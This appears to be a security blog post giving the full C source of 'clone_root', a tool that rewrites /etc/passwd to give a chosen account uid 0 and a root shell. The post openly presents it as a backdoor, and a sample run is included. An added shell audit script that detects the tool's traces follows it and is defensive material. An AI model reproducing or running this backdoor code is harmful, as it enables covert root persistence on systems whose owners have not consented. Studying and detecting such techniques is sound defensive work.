    January 01

    clone root for linux by FILE

    clone root for linux

    We know the easiest way to make a backdoor is to create or edit an account so that its uid=0.

    The program changes the specified account's uid to zero.

    In this way, the account is treated as root, because the system decides privilege by the uid, not by the account name.


    ---------------------------------- clone_root.c ------------------------------------

    #include <stdio.h>
    #include <stdlib.h>        /* exit(), system() */
    #include <string.h>

    #define MAXBUF 256

    int main(int argc, char *argv[])
    {
            FILE *fp,*mfp;                //two file pointers
            char buf[MAXBUF];        //buffer
            int bIn;                        //whether the account exists
            char accountname[MAXBUF];        //the account name followed by ":"
            char *filename[]={"/etc/passwd","./tmp_cr"};        //the two file names
            
            /*display the logo of the program*/
            printf("\nclone root   version 1.0\t\tby dorainm\tdorainm@gmail.com");
            printf("\n--------------------------------------------------------------------------");
            printf("\nmake sure that you run this program as root\n");
            printf("\tor your account can write the passwd file");
            
            /*display the usage when the arguments are wrong*/
            if(argc!=2){
                    printf("\nUsage:\t%s username\n\n",argv[0]);
                    exit(1);
            }

            /*append the char ":" to the end of the account name so that the check
            for an existing account is more accurate. otherwise there would be no difference
            between the accounts "example1" and "example2" when we clone the account "example".
            note: strstr() below still matches this string anywhere in a line*/
            strcpy(accountname,argv[1]);
            strcat(accountname,":");

            /*check whether the "passwd" file can be opened*/
            if((fp=fopen(filename[0],"r"))==NULL){
                    printf("\nError: can not open the file %s.\n\n",filename[0]);
                    exit(2);
            }

            /*check whether the "temp" file can be created*/
            if((mfp=fopen(filename[1],"w"))==NULL){
                    printf("\nError: can not creat the tmp file %s.\n\n",filename[1]);
                    exit(3);
            }

            /*initialize the variable "bIn", which records whether AccountName&":" was found.
            read the "passwd" file one line at a time; if the specified account name appears in the line,
            write the new line in its place, otherwise copy the old line unchanged*/
            bIn=0;
            while(fgets(buf,MAXBUF,fp)!=NULL){
                    if(strstr(buf,accountname)){
                            bIn=1;
                            fprintf(mfp,"%s:!:0:0:%s:/root:/bin/sh\n",argv[1],argv[1]);
                    }else{
                            fprintf(mfp,"%s",buf);
                    }
            }

            /*close the file pointers*/
            fclose(fp);        
            fclose(mfp);

            /*when the account does not exist, display the error message and remove the temp file*/
            if(bIn==0){
                    printf("\nError: the account \"%s\" is not existed.\n\n",argv[1]);
                    system("rm ./tmp_cr");
                    exit(4);
            }

            /*congratulations, replace the passwd file; the specified account is now known as "root"*/
            system("mv ./tmp_cr /etc/passwd");
            printf("\nclone the account \"%s\" is completed successfully.\n\n",argv[1]);
            return 0;
    }

    --------------------------------- end of file ---------------------------------

    [root@dorainm clone_root]# ./clone_root

    clone root   version 1.0                by dorainm      dorainm@gmail.com
    --------------------------------------------------------------------------
    make sure that you run this program as root
            or your account can write the passwd file
    Usage:  ./clone_root username
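
Added example, not part of the original post: a shell audit that flags what clone_root.c leaves behind in a passwd-format file, namely a non-root account with uid 0, the exact field values its fprintf() writes, and the duplicate entries produced when strstr() matches "name:" inside another line. The function names, output labels and sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit passwd-format input for the traces of clone_root.c.
# Reads the named file(s), or stdin when no file is given.
audit_uid0() {
    awk -F: '
        NF == 0 { next }                                   # skip blank lines
        NF != 7 { printf "MALFORMED line %d\n", NR; next }
        # Any account other than root whose UID field is numerically zero.
        $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $1 != "root" {
            sig = ""
            # Exact field values written by the fprintf() in clone_root.c.
            if ($2 == "!" && $5 == $1 && $6 == "/root" && $7 == "/bin/sh")
                sig = " clone_root-pattern"
            printf "UID0 %s%s\n", $1, sig
        }
        # strstr() rewrites every line containing "name:", so a second
        # matching line turns into a duplicate entry for the same account.
        seen[$1]++ { printf "DUPLICATE %s\n", $1 }
    ' "$@"
}

# Constructed sample: "alice" was rewritten, and a second line that also
# contained "alice:" (for example an account "malice") was rewritten with it.
sample_passwd() {
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'alice:!:0:0:alice:/root:/bin/sh' \
        'toor:x:0:0:backup admin:/home/toor:/bin/bash' \
        'alice:!:0:0:alice:/root:/bin/sh' \
        'bob:x:1001:1001:Bob:/home/bob:/bin/bash'
}

# Demo on the constructed sample; on a real host: audit_uid0 /etc/passwd
sample_passwd | audit_uid0
```

Any `UID0` line deserves review even without the pattern tag, since the tag only matches the literal fields this particular program writes.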
